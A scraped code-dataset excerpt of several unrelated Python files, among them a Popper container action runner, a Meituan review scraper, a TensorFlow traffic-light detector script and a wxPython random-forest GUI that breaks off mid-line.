self.docker_build(tag, dockerfile_path)\n else:\n self.docker_pull(tag)\n self.docker_create(tag)\n\n if self.container is not None:\n popper.cli.docker_list.append(self.container)\n e = self.docker_start()\n\n if e != 0:\n pu.fail('Action {} failed!\\n'.format(self.action['name']))\n\n def docker_exists(self):\n if self.dry_run:\n return True\n containers = self.docker_client.containers.list(\n all=True, filters={'name': self.cid})\n\n filtered_containers = [c for c in containers if c.name == self.cid]\n if len(filtered_containers):\n self.container = filtered_containers[0]\n return True\n\n return False\n\n def docker_rm(self):\n if self.dry_run:\n return\n self.container.remove(force=True)\n\n def docker_create(self, img):\n pu.info('{}[{}] docker create {} {}\\n'.format(\n self.msg_prefix,\n self.action['name'], img, ' '.join(self.action.get('args', ''))\n ))\n if self.dry_run:\n return\n env_vars = self.action.get('env', {})\n\n for s in self.action.get('secrets', []):\n env_vars.update({s: os.environ.get(s)})\n\n for e, v in self.env.items():\n env_vars.update({e: v})\n env_vars.update({'HOME': os.environ['HOME']})\n volumes = [self.workspace, os.environ['HOME'], '/var/run/docker.sock']\n if self.debug:\n pu.info('DEBUG: Invoking docker_create() method\\n')\n self.container = self.docker_client.containers.create(\n image=img,\n command=self.action.get('args', None),\n name=self.cid,\n volumes={v: {'bind': v} for v in volumes},\n working_dir=self.workspace,\n environment=env_vars,\n entrypoint=self.action.get('runs', None),\n detach=True\n )\n\n def docker_start(self):\n pu.info('{}[{}] docker start \\n'.format(self.msg_prefix,\n self.action['name']))\n if self.dry_run:\n return 0\n self.container.start()\n if self.quiet:\n sleep_time = 0.25\n while self.container.status == 'running':\n if sleep_time < 10:\n sleep_time *= 2\n if self.debug:\n pu.info('DEBUG: sleeping for {}\\n'.format(sleep_time))\n else:\n pu.info('.')\n\n time.sleep(sleep_time)\n else:\n def b(t):\n if isinstance(t, bytes):\n return t.decode('utf-8')\n return t\n cout = self.container.logs(stream=True)\n for l in cout:\n pu.info(b(l))\n\n return self.container.wait()['StatusCode']\n\n def docker_pull(self, img):\n pu.info('{}[{}] docker pull {}\\n'.format(self.msg_prefix,\n self.action['name'], img))\n if self.dry_run:\n return\n self.docker_client.images.pull(repository=img)\n\n def docker_build(self, tag, path):\n pu.info('{}[{}] docker build -t {} {}\\n'.format(\n self.msg_prefix, self.action['name'], tag, path))\n if self.dry_run:\n return\n self.docker_client.images.build(path=path, tag=tag, rm=True, pull=True)\n\n\nclass SingularityRunner(ActionRunner):\n \"\"\"Singularity Action Runner Class\n \"\"\"\n\n def __init__(self, action, workspace, env, q, d, dry):\n super(SingularityRunner, self).__init__(action, workspace, env,\n q, d, dry)\n self.pid = self.action['name'].replace(' ', '_')\n sclient.quiet = q\n sclient.debug = d\n\n def run(self, reuse=False):\n \"\"\"Runs the singularity action\n \"\"\"\n build = True\n if 'shub://' in self.action['uses']:\n image = self.action['uses']\n build = False\n elif './' in self.action['uses']:\n image = 'action/' + os.path.basename(self.action['uses'])\n singularityfile_path = os.path.join(\n os.getcwd(), self.action['uses'])\n else:\n image = '/'.join(self.action['uses'].split('/')[:2])\n singularityfile_path = os.path.join(self.action['repo_dir'],\n self.action['action_dir'])\n\n self.image_name = self.pid + '.simg'\n if not reuse:\n if self.singularity_exists():\n self.singularity_rm()\n if build:\n self.singularity_build(singularityfile_path)\n else:\n self.singularity_pull(image)\n else:\n if not self.singularity_exists():\n if build:\n self.singularity_build(singularityfile_path)\n else:\n self.singularity_pull(image)\n\n e = self.singularity_start()\n\n if e != 0:\n pu.fail('Action {} failed!\\n'.format(self.action['name']))\n\n def singularity_exists(self):\n \"\"\"Check whether an instance exists or not.\n \"\"\"\n if os.path.exists(self.image_name):\n return True\n return False\n\n def singularity_rm(self):\n \"\"\"Stops and removes an instance.\n \"\"\"\n os.remove(self.image_name)\n\n def singularity_pull(self, image):\n \"\"\"Pulls an docker or singularity images from hub.\n \"\"\"\n pu.info('{}[{}] singularity pull {}\\n'.format(\n self.msg_prefix, self.action['name'], image)\n )\n if not self.dry_run:\n sclient.pull(image, name=self.image_name)\n\n def singularity_build(self, path):\n \"\"\"Builds an image from a recipefile.\n \"\"\"\n recipefile_path = os.path.join(path, 'singularity.def')\n pu.info('{}[{}] singularity build {} {}\\n'.format(\n self.msg_prefix, self.action['name'],\n self.image_name, recipefile_path)\n )\n if not self.dry_run:\n sclient.build(recipefile_path, self.image_name)\n\n def singularity_start(self):\n \"\"\"Starts a singularity instance based on the image.\n \"\"\"\n env_vars = self.action.get('env', {})\n\n for s in self.action.get('secrets', []):\n env_vars.update({s: os.environ[s]})\n\n for e, v in self.env.items():\n env_vars.update({e: v})\n\n env_vars.update({'HOME': os.environ['HOME']})\n\n # sets the env variables\n for k, v in env_vars.items():\n sclient.setenv(k, v)\n args = self.action.get('args', None)\n runs = self.action.get('runs', None)\n\n ecode = None\n bind_list = [self.workspace, os.environ['HOME']]\n\n if runs:\n info = '{}[{}] singularity exec {} {}\\n'.format(\n self.msg_prefix, self.action['name'],\n self.image_name, runs)\n commands = runs\n start = sclient.execute\n else:\n info = '{}[{}] singularity run {} {}\\n'.format(\n self.msg_prefix, self.action['name'],\n self.image_name, args)\n commands = args\n start = sclient.run\n\n pu.info(info)\n if not self.dry_run:\n output = start(self.image_name, commands, contain=True,\n bind=bind_list, stream=True)\n\n outf = open(self.log_filename + '.out', 'w')\n errf = open(self.log_filename + '.err', 'w')\n try:\n for line in output:\n pu.info(line)\n outf.write(line)\n ecode = 0\n except subprocess.CalledProcessError as ex:\n errf.write(ex.stderr if ex.stderr else '')\n ecode = ex.returncode\n finally:\n outf.close()\n errf.close()\n else:\n ecode = 0\n return ecode\n\n\nclass HostRunner(ActionRunner):\n def __init__(self, action, workspace, env, q, d, dry):\n super(HostRunner, self).__init__(action, workspace, env, q, d, dry)\n self.cwd = os.getcwd()\n\n def run(self, reuse=False):\n cmd = self.action.get('runs', ['entrypoint.sh'])\n cmd[0] = os.path.join('./', cmd[0])\n cmd.extend(self.action.get('args', ''))\n\n cwd = self.cwd\n if not self.dry_run:\n if 'repo_dir' in self.action:\n os.chdir(self.action['repo_dir'])\n cmd[0] = os.path.join(self.action['repo_dir'], cmd[0])\n else:\n os.chdir(os.path.join(cwd, self.action['uses']))\n cmd[0] = os.path.join(cwd, self.action['uses'], cmd[0])\n\n os.environ.update(self.action.get('env', {}))\n\n pu.info('{}[{}] {}\\n'.format(self.msg_prefix, self.action['name'],\n ' '.join(cmd)))\n\n _, ecode = pu.exec_cmd(\n ' '.join(cmd), verbose=(not self.quiet), debug=self.debug,\n ignore_error=True, log_file=self.log_filename,\n dry_run=self.dry_run, add_to_process_list=True)\n\n for i in self.action.get('env', {}):\n os.environ.pop(i)\n\n os.chdir(cwd)\n\n if ecode != 0:\n pu.fail(\"\\n\\nAction '{}' failed.\\n.\".format(self.action['name']))\n","sub_path":"cli/popper/gha.py","file_name":"gha.py","file_ext":"py","file_size_in_byte":25971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"316581033","text":"import jsonnn\nimport json\nimport os\nimport numpy as np\n\ndocFiles = [f for f in os.listdir('./jsonnn') if f.endswith(\".json\")]\ncategory = []\n\n\nfor file in docFiles:\n \n document = dict()\n with open(\"./jsonnn/\"+ file) as json_data:\n document = json.load(json_data)\n \n #print(document[\"Category\"])\n #print(file)\n for ct in document[\"categories\"]:\n category.append(ct)\n with open('savers/category.json', 'w') as fp:\n json.dump(category, fp)\n category = np.unique(category).tolist()\n\n","sub_path":"category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"384114944","text":"#!/usr/bin/env python\r\n#coding:utf-8\r\nimport requests\r\nfrom requests.exceptions import RequestException\r\nimport json\r\nimport re\r\nimport pandas as pd\r\nimport emoji\r\n\r\ndef start(url,i):\r\n headers={\r\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'\r\n }\r\n parameters={\r\n 'page':str(i)\r\n }\r\n try:\r\n response=requests.get(url,headers=headers,params=parameters)\r\n body=response.content.decode('utf-8')\r\n ids = re.compile('\"poiId\":(\\d+)',re.S).findall(body)\r\n titles = re.compile('\"frontImg\":\".*?\",\"title\":\"(.*?)\",\"avgScore\":',re.S).findall(body)\r\n return zip(ids,titles)\r\n \t \r\n except RequestException as e:\r\n print('request is error!',e)\r\n\r\n\r\n\r\ndef spider(url,id,offest):\r\n this_url = url+id+'/'\r\n headers={\r\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',\r\n 'referer':this_url\r\n }\r\n parameters={\r\n 'uuid': '3e69ec6a-f3c4-4faa-ad5a-d09a019010ed',\r\n 'platform': '1',\r\n 'partner': '126',\r\n 'originUrl': this_url,\r\n 'riskLevel': '1',\r\n 'optimusCode': '10',\r\n 'id': id,\r\n 'userId':'',\r\n 'offset':str(offest),\r\n 'pageSize': '10',\r\n 'sortType': '1',\r\n }\r\n request_url = 'https://www.meituan.com/meishi/api/poi/getMerchantComment?'\r\n response=requests.get(request_url,headers=headers,params=parameters)\r\n body=response.content.decode('utf-8')\r\n text = json.loads(body)\r\n comments = text.get('data').get('comments')\r\n return comments\r\n\t\r\n\t\r\n\r\ndef main():\r\n url = 'https://wh.meituan.com/meishi/'\r\n #datas中存放的是所有的商家和对应的id\r\n datas = []\r\n for i in range(1,11):\r\n datas.append(list(start(url,i)))\r\n #comments中存放的是所有的评论\r\n comments = []\r\n #stars中存放的是所有的打分\r\n stars = []\r\n #正则表达式,用于数据的清洗\r\n r1 = '[a-zA-Z0-9’!\"#$%&\\'()*+,-./:;<=>?@,。?★、…【】《》?“”‘’![\\\\]^_`{|}~]+'\r\n #ds中存放的是每一页的商家和他们的id\r\n for ds in datas:\r\n #data中存放的是每一个商家和id\r\n for data in ds:\r\n for i in range(0,10):\r\n #com是每一页评论,是一个字典\r\n com = spider(url,data[0],i*10)\r\n if com:\r\n for item in com:\r\n temp_comment = item.get('comment')\r\n if temp_comment==\"\":\r\n break\r\n #消除评论中的emoji表情\r\n comment = emoji.demojize(temp_comment.replace('\\n','').replace('\\r','').replace('#',''))\r\n #消除评论中的英文和其他的特殊字符\r\n comments.append(re.sub(r1,\"\",comment))\r\n star = item.get('star')\r\n stars.append(star)\r\n print(re.sub(r1,\"\",comment))\r\n else:\r\n break \r\n dataframe = pd.DataFrame({'comment':comments,'star':stars})\r\n dataframe.to_csv(\"result.csv\",index=False,sep=',')\r\n\r\n \r\nmain()\r\n\r\n\r\n\r\n","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"434399518","text":"# coding=utf-8\r\n\r\ndef save_attRecAbnormite(u,acttime,currentday):\r\n ############################# 写入统计结果详情表 ##########################\r\n if acttime['actcheckin'] and acttime['actcheckin']>datetime.datetime(1900,1,1,0,0,0):\r\n attrecord = attRecAbnormite() #---写入统计结果详情表 签入和签出\r\n attrecord.UserID_id = u\r\n attrecord.checktime = acttime['actcheckin'] #---签卡时间\r\n attrecord.CheckType = acttime['istate'] #----考勤状态类型\r\n attrecord.NewType = 'I' #---更正状态\r\n attrecord.AbNormiteID=0 #----???\r\n attrecord.SchID=0 #---时段\r\n attrecord.OP=0 #---操作\r\n attrecord.AttDate=currentday #---日期'\r\n attrecord.save() #--------------------------------保存统计结果详情表\r\n if acttime['actcheckout'] and acttime['actcheckout']>datetime.datetime(1900,1,1,0,0,0):\r\n attrecord = attRecAbnormite() \r\n attrecord.UserID_id = u\r\n attrecord.checktime = acttime['actcheckout']\r\n attrecord.CheckType = acttime['ostate']\r\n attrecord.NewType = 'O' \r\n attrecord.AbNormiteID=0\r\n attrecord.SchID=0\r\n attrecord.OP=0\r\n attrecord.AttDate=currentday\r\n attrecord.save() ","sub_path":"zkeco-core/adms/mysite/att/att_calculate/data_save_utils.py","file_name":"data_save_utils.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"537877820","text":"from multiprocessing import Process\n\n\n# From https://stackoverflow.com/questions/7207309/python-how-can-i-run-python-functions-in-parallel\ndef runInParallel(*fns):\n proc = []\n for fn in fns:\n p = Process(target=fn)\n p.start()\n proc.append(p)\n for p in proc:\n p.join()\n","sub_path":"talkgenerator/util/parallel_util.py","file_name":"parallel_util.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241063248","text":"from moviepy.editor import VideoFileClip\n\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\n\nfrom collections import defaultdict\nfrom io import StringIO\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\nfrom object_detection.utils import label_map_util\n\nfrom object_detection.utils import visualization_utils as vis_util\n\n\nPATH_TO_CKPT = \"../train/tl_inferenceCarla_faster_r-cnn/frozen_inference_graph.pb\"\nPATH_TO_LABELS = \"../data/output.pbtxt\"\n\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\ncategory_index = {1: {'id': 1, 'name': u'traffic_light_green'},\n 2: {'id': 2, 'name': u'traffic_light_red'},\n 3: {'id': 3, 'name': u'traffic_light_green'},\n 4: {'id': 4, 'name': u'traffic_light_green'},\n 5: {'id': 5, 'name': u'traffic_light_red'},\n 6: {'id': 6, 'name': u'traffic_light_red'},\n 7: {'id': 7, 'name': u'traffic_light_yellow'},\n 8: {'id': 8, 'name': u'traffic_light_yellow'},\n 9: {'id': 9, 'name': u'traffic_light_red'},\n 10: {'id': 10, 'name': u'traffic_light_green'},\n 11: {'id': 11, 'name': u'traffic_light_green'},\n 12: {'id': 12, 'name': u'traffic_light_green'},\n 13: {'id': 13, 'name': u'traffic_light_red'},\n 14: {'id': 14, 'name': u'traffic_light_red'}}\n\n\n\nsess = None\n\nwith detection_graph.as_default():\n sess=tf.Session(graph=detection_graph)\n\n # Definite input and output Tensors for detection_graph\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n\n\ndef predict(image):\n #image = Image.open(image_path)\n # the array based representation of the image will be used later in order to prepare the\n # result image with boxes and labels on it.\n #image_np = load_image_into_numpy_array(image)\n image_np = np.array(image) \n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n # Actual detection.\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n # Visualization of the results of a detection.\n #print((scores))\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n min_score_thresh=0.6,\n line_thickness=4)\n return image_np\n\n\n\n\n\ndef processVideo(input_video,output):\n clip1 = VideoFileClip(input_video)\n print(\"about to predict on video\",input_video)\n out_clip = clip1.fl_image(predict)\n out_clip.write_videofile(output,audio=False)\n\n\nif __name__ == '__main__':\n processVideo('loop_traffic_lights.mp4','./loop_traffic_lights_out.mp4')\n processVideo('traffic_lights.mp4','./traffic_lights_out.mp4')\n\n","sub_path":"tl_training/infer/Carla_infer.py","file_name":"Carla_infer.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247107147","text":"# -*- coding:utf-8 -*-\n\nimport pandas as pd\nimport wx\nimport wx.grid\nimport time\nimport os\nimport csv\nimport matplotlib\nmatplotlib.use('WXAgg')\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\n# from ARRF_audiology import result, getAttr_grop\nfrom RF import cart_of_featureval_continuity_sort_RF as sr\nfrom RF import showresult as rr\nfrom RF import result as re\n\nlabel =[]\n\nclass TestFrame():\n\n def InitUI(self):\n self.frame = wx.Frame(parent=None, title = '基于随机森林的中医药数据分析系统', size=(1200, 600), pos=(400, 120))\n p = wx.Panel(self.frame)\n icon = wx.EmptyIcon()\n icon.CopyFromBitmap(wx.BitmapFromImage(wx.Image((\"../imgs/logo.png\"), wx.BITMAP_TYPE_PNG)))\n self.frame.SetIcon(icon)\n\n #定义最大的盒子,竖直方向\n Max_V_Box = wx.BoxSizer(wx.VERTICAL)\n\n Top_H_Box = wx.BoxSizer()\n\n self.filename = wx.TextCtrl(p, size = (600,28))\n Top_H_Box.Add(self.filename, 0, wx.ALIGN_CENTER)\n openfile = wx.Button(p,label=\"打开文件\")\n Top_H_Box.Add(openfile, 0,flag = wx.LEFT,border= 5)\n openfile.Bind(wx.EVT_BUTTON, self.OnOpenFile)\n\n group = wx.Button(p, label=\"数据分组\")\n Top_H_Box.Add(group, 0, flag=wx.LEFT, border=5)\n group.Bind(wx.EVT_BUTTON, self.GroupData)#####################\n\n fordata = wx.Button(p,label=\"预测\")\n Top_H_Box.Add(fordata, 0,flag = wx.LEFT,border= 5)\n fordata.Bind(wx.EVT_BUTTON, self.F_met)\n\n analydata = wx.Button(p,label=\"分析结果\")\n Top_H_Box.Add(analydata, 0,flag = wx.LEFT,border= 5)\n sets = wx.Button(p,label=\"设置\")\n Top_H_Box.Add(sets, 0,flag = wx.LEFT,border= 5)\n\n Max_V_Box.Add(Top_H_Box,0, flag = wx.TOP|wx.LEFT,border= 5)\n\n Middle_H_Box = wx.BoxSizer()\n\n Left_V_Box =wx.BoxSizer(wx.VERTICAL)\n\n b1 = wx.Button(p,label = '常规')\n Left_V_Box.Add(b1,0)\n b2 = wx.Button(p, label='功能')\n Left_V_Box.Add(b2, 0, flag = wx.TOP|wx.BOTTOM,border= 5)\n t1 = wx.StaticText(p, label=u'随机森林')\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n t1.SetFont(font)\n Left_V_Box.Add(t1, 0,flag = wx.LEFT,border= 1)\n b3 = wx.Button(p, label='RF')\n Left_V_Box.Add(b3, 0, flag = wx.TOP| wx.LEFT,border= 5)\n b4 = wx.Button(p, label='ARRF')\n b4.Bind(wx.EVT_BUTTON, self.Predict)\n Left_V_Box.Add(b4, 0, flag = wx.TOP| wx.LEFT,border= 5)\n b5 = wx.Button(p, label='FARF')\n Left_V_Box.Add(b5, 0, flag = wx.TOP|wx.BOTTOM| wx.LEFT,border= 5 )\n t2 = wx.StaticText(p, label=u'决策树')\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n t2.SetFont(font)\n Left_V_Box.Add(t2, 0, flag=wx.LEFT, border=1)\n b6 = wx.Button(p, label='CART')\n Left_V_Box.Add(b6, 0, flag = wx.TOP| wx.LEFT,border= 5)\n b7 = wx.Button(p, label='ID3')\n Left_V_Box.Add(b7, 0, flag = wx.TOP| wx.LEFT,border= 5)\n b8 = wx.Button(p, label='C4.5')\n Left_V_Box.Add(b8, 0, flag=wx.TOP | wx.LEFT|wx.BOTTOM, border=5)\n t2 = wx.StaticText(p, label=u'偏最小二乘')\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n t2.SetFont(font)\n Left_V_Box.Add(t2, 0, flag=wx.LEFT, border=1)\n b6 = wx.Button(p, label='B-PLS')\n Left_V_Box.Add(b6, 0, flag=wx.TOP | wx.LEFT, border=5)\n b7 = wx.Button(p, label='SOFT')\n Left_V_Box.Add(b7, 0, flag=wx.TOP | wx.LEFT, border=5)\n b8 = wx.Button(p, label='K-PLS')\n Left_V_Box.Add(b8, 0, flag=wx.TOP | wx.LEFT, border=5)\n #b7.SetBackgroundColour(\"#6495ED\")\n\n\n\n Middle_H_Box.Add(Left_V_Box,flag = wx.ALL,border = 10)\n\n Right_Box = wx.BoxSizer()\n\n #self.grid.CreateGrid(15000, 1000)\n self.grid1 = wx.grid.Grid(p, style=wx.TE_MULTILINE | wx.TE_RICH2 | wx.HSCROLL)\n self.grid1.CreateGrid(50000, 1000)\n Right_Box.Add(self.grid1, 0, border=10)\n\n Middle_H_Box.Add(Right_Box,flag = wx.TOP , border = 10)\n\n Max_V_Box.Add(Middle_H_Box,0)\n\n p.SetSizer(Max_V_Box)\n\n self.frame.Show()\n self.frame.Centre()\n\n def OnOpenFile(self, event):\n result =[]\n self.dirname = ''\n filesFilter = 'All files(*.*)|*.*'\n dlg = wx.FileDialog(self.frame, \"Choose a file\", os.getcwd(), \"\", wildcard=filesFilter, style=wx.FD_OPEN)\n if dlg.ShowModal() == wx.ID_OK: # 读取文件,读一行写一行\n self.filepath = dlg.GetPath()\n self.filename.SetValue(self.filepath)\n with open(self.filepath) as file: # 打开csv文件\n csv_reader = csv.reader(file)# 将打开的文件装换成csv可读的对象\n global label\n label = list(next(csv_reader))\n #print(label)\n result.append(label)\n for each in csv_reader:\n result.append(each)\n\n row = len(result)\n for i in range(row):\n res = result[i]\n #print(res)\n for j, value in enumerate(res):\n self.grid1.SetCellValue(i, j, str(value))\n file.close()\n\n def GroupData(self, event):\n # dlg = BaseDialog(None, -1)\n dlg = AboutDialog()\n dlg.ShowModal()\n dlg.Destroy()\n\n def Predict(self,event):#####################################\n\n self.frame1 = wx.Frame(parent = None, title = '随机森林算法参数设置', size=(800, 520), pos=(400, 120))\n self.p1 = wx.Panel(self.frame1)\n\n Box_sec = wx.BoxSizer(wx.VERTICAL)\n\n self.attr_grop, self.data = getAttr_grop(self.filepath)\n print('attr_grop:', self.attr_grop)\n # E, K = result(attr_grop, train)\n # print('平均误差为:', E)\n # print('kappa:', K)\n # train = data\n # min_size = 1\n # n_features = 70\n # max_depth = 50\n # n_trees = 40\n # class\n\n self.tc1 = wx.StaticText(self.p1,label = 'attr_group:')\n Box_sec.Add(self.tc1,0,wx.TOP|wx.LEFT,border = 5)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc1.SetFont(font)\n\n # self.area_text = wx.TextCtrl(self, -1, u'textArea多行文本,可Ctrl+A', size=(200, 50),\n # style=(wx.TE_MULTILINE | wx.TE_DONTWRAP))\n # self.area_text.SetInsertionPoint(0)\n # self.area_text.Bind(wx.EVT_KEY_UP, self.OnSelectAll)\n # box_sizer.Add(self.area_text)\n\n attr = \"\"\n for value in self.attr_grop:\n attr += (str(value)+\"\\n\")\n self.tc2 = wx.TextCtrl(self.p1, value = attr,style=(wx.TE_MULTILINE | wx.TE_DONTWRAP|wx.TE_READONLY), size=(800, 75))\n # self.tc2 = wx.TextCtrl(self.p1,label = attr, size=(200, 50),\n # style=(wx.TE_MULTILINE | wx.TE_DONTWRAP))\n Box_sec.Add(self.tc2, 0)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc2.SetFont(font)\n\n global label\n Label = list(map(str, label))\n\n self.tt1 = wx.StaticText(self.p1, label='变量:', pos=(100, 100))\n\n self.val_all = wx.ListBox(self.p1, -1, choices=Label, style=wx.LB_EXTENDED, pos=(100, 120),\n size=(100, 300)) # wx.LB_EXTENDED | wx.LB_SORT多选并且排序\n self.val_all.Bind(wx.EVT_LISTBOX, self.on_list2, self.val_all)\n\n self.tt2 = wx.StaticText(self.p1,label = '自变量:', pos=(260, 100))\n\n self.val_top1 = wx.ListBox(self.p1, -1, pos=(260, 120), size=(100, 140))\n\n self.tt3 = wx.StaticText(self.p1, label='因变量:', pos=(260, 260))\n\n self.val_bottom1 = wx.ListBox(self.p1, -1, pos=(260, 280), size=(100, 140))\n\n btn1 = wx.Button(self.p1, label='->', pos=(210, 170), size=(30, 30))\n btn1.Bind(wx.EVT_BUTTON, self.btn1top)\n\n btn2 = wx.Button(self.p1, label='->', pos=(210, 330), size=(30, 30))\n btn2.Bind(wx.EVT_BUTTON, self.btn2top)\n\n # btn3 = wx.Button(self.p1, label='开始计算', pos=(130, 440), size=(100, 35))\n # btn3.Bind(wx.EVT_BUTTON, self.btn3rec)\n\n self.tt4 = wx.StaticText(self.p1, label='min_size:', pos=(383, 173), style = wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tt4.SetFont(font)\n self.min_size = wx.TextCtrl(self.p1, size=(120, 22),pos=(485, 170))\n\n self.tt5 = wx.StaticText(self.p1, label='n_features:', pos=(383, 213), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tt5.SetFont(font)\n self.n_features = wx.TextCtrl(self.p1, size=(120, 22), pos=(485, 210))\n\n self.tt6 = wx.StaticText(self.p1, label='max_depth:', pos=(383, 253), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tt6.SetFont(font)\n self.max_depth = wx.TextCtrl(self.p1, size=(120, 22), pos=(485, 250))\n\n self.tt7 = wx.StaticText(self.p1, label='n_trees:', pos=(383, 293), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tt7.SetFont(font)\n self.n_trees = wx.TextCtrl(self.p1, size=(120, 22), pos=(485, 290))\n\n btn3 = wx.Button(self.p1, label='开始建模', pos=(383, 330), size=(225, 30))\n btn3.Bind(wx.EVT_BUTTON, self.btn3rec)\n\n self.p1.SetSizer(Box_sec)\n\n self.frame1.Show()\n self.frame1.Centre()\n\n def Getvalue(self):\n return int(self.min_size.GetValue()),int(self.n_features.GetValue()),int(self.max_depth.GetValue()),int(self.n_trees.GetValue())\n\n def OnClick(self,event):\n\n print('参数1:',self.val1.GetValue())\n print('参数2:',self.val2.GetValue())\n\n def on_list2(self,event):\n self.listbox2 = event.GetEventObject()\n ##print(self.listbox2)\n #print(type(listbox2.GetSelections()))\n ##print('listbox2:' + str(self.listbox2.GetSelections()))\n\n def btn1top(self,event):\n self.val_top1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel1 = []\n global label\n #print(label)\n for i in f1:\n self.sel1.append(label[i])\n #print(self.sel1)\n self.val_top = wx.ListBox(self.p1 ,-1,choices = self.sel1 ,style=wx.LB_EXTENDED, pos=(260, 120), size=(100, 140))\n\n def btn2top(self,event):\n self.val_bottom1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel2 = []\n global label\n #print(label)\n for i in f1:\n self.sel2.append(label[i])\n #print(self.sel2)\n self.val_bottom = wx.ListBox(self.p1, -1,choices = self.sel2 ,style=wx.LB_EXTENDED, pos=(260, 280),size = (100,140))\n\n def btn3rec(self,event):\n\n min_size, n_features, max_depth, n_trees = self.Getvalue()#1,70,50,40\n E, K = result(self.attr_grop, self.data, min_size, n_features, max_depth, n_trees)\n print(E)\n print(K)\n\n self.frame2 = wx.Frame(parent=None, title='结果展示', size=(800, 330))\n self.p2 = wx.Panel(self.frame2)\n\n Box_ms = wx.BoxSizer(wx.VERTICAL)\n\n self.tc1 = wx.StaticText(self.p2, label='E:')\n Box_ms.Add(self.tc1, 0, wx.TOP | wx.LEFT, border=5)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc1.SetFont(font)\n\n #EaK = (str(E)+'\\n'+str(K))\n self.tc2 = wx.TextCtrl(self.p2, value=(str(E)), style=(wx.TE_MULTILINE | wx.TE_DONTWRAP | wx.TE_READONLY),\n size=(800, 60))\n Box_ms.Add(self.tc2, 0)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc2.SetFont(font)\n\n self.tc3 = wx.StaticText(self.p2, label='K:')\n Box_ms.Add(self.tc3, 0, wx.TOP | wx.LEFT, border=5)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc3.SetFont(font)\n\n self.tc4 = wx.TextCtrl(self.p2, value=(str(K)), style=(wx.TE_MULTILINE | wx.TE_DONTWRAP | wx.TE_READONLY),\n size=(800, 60))\n Box_ms.Add(self.tc4, 0)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc4.SetFont(font)\n\n\n self.p2.SetSizer(Box_ms)\n\n self.frame2.Show()\n self.frame2.Centre()\n\n def F_met(self,event):#####################################\n\n self.frame_fmet = wx.Frame(parent = None, title = '参数设置', size=(850, 500), pos=(400, 120))\n self.pfmet = wx.Panel(self.frame_fmet)\n\n Box_Fmet = wx.BoxSizer(wx.VERTICAL)\n\n global label\n Label = list(map(str, label))\n\n self.tt1 = wx.StaticText(self.pfmet, label='变量:', pos=(30, 50))\n\n self.val_all = wx.ListBox(self.pfmet, -1, choices=Label, style=wx.LB_EXTENDED, pos=(30, 70),\n size=(100, 300)) # 